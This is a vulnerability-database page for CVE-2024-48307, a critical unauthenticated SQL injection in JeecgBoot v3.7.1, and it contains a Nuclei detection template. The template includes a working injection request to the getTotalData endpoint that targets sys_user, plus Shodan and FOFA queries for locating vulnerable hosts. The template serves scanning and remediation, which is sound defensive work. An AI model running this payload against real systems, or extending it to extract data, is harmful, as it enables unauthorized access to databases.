JeecgBoot v3.7.1 has a critical SQL Injection vulnerability via the getTotalData endpoint.
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
Veracode | SQL Injection | 12 Nov 202405:14 | – | veracode |
CVE | CVE-2024-48307 | 31 Oct 202401:15 | – | cve |
Vulnrichment | CVE-2024-48307 | 31 Oct 202400:00 | – | vulnrichment |
OSV | JeecgBoot SQL Injection vulnerability | 31 Oct 202403:30 | – | osv |
NVD | CVE-2024-48307 | 31 Oct 202401:15 | – | nvd |
Github Security Blog | JeecgBoot SQL Injection vulnerability | 31 Oct 202403:30 | – | github |
Cvelist | CVE-2024-48307 | 31 Oct 202400:00 | – | cvelist |
id: CVE-2024-48307
info:
name: JeecgBoot v3.7.1 - SQL Injection
author: lbb,s4e-io
severity: critical
description: |
The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.
remediation: |
Validate and sanitize user inputs on the server side to prevent SQL injection attacks. Use prepared statements with parameterized queries instead of dynamic queries. Regularly update and patch the application to fix known vulnerabilities.
reference:
- https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E6%8E%A5%E5%8F%A3getTotalData%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2024-48307).md
- https://github.com/jeecgboot/JeecgBoot/issues/7237
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-48307
cwe-id: CWE-89
epss-score: 0.00045
epss-percentile: 0.17463
metadata:
max-request: 2
vendor: jeecg
product: jeecg_boot
fofa-query:
- icon_hash="-250963920"
- icon_hash=1380908726
- title="jeecg-boot"
shodan-query: http.favicon.hash:"1380908726"
tags: cve2024,cve,jeecg,sqli
variables:
num: "999999999"
http:
- raw:
- |
POST {{path}}drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(md5({{num}}),0x3a,0x3a)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}
payloads:
path:
- /jeecg-boot/
- /
attack: batteringram
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains(body, "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==")'
- 'contains(content_type, "application/json")'
- "status_code == 200"
condition: and
# digest: 490a0046304402205e6a3d5790483b0bdde032ed47c62a8c417e879b0898511f3099a2cb23166f1402207dcb78d5840d53b890f959a5d11ce8bf25d8515b6113b01fa0bddfb8591531af:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo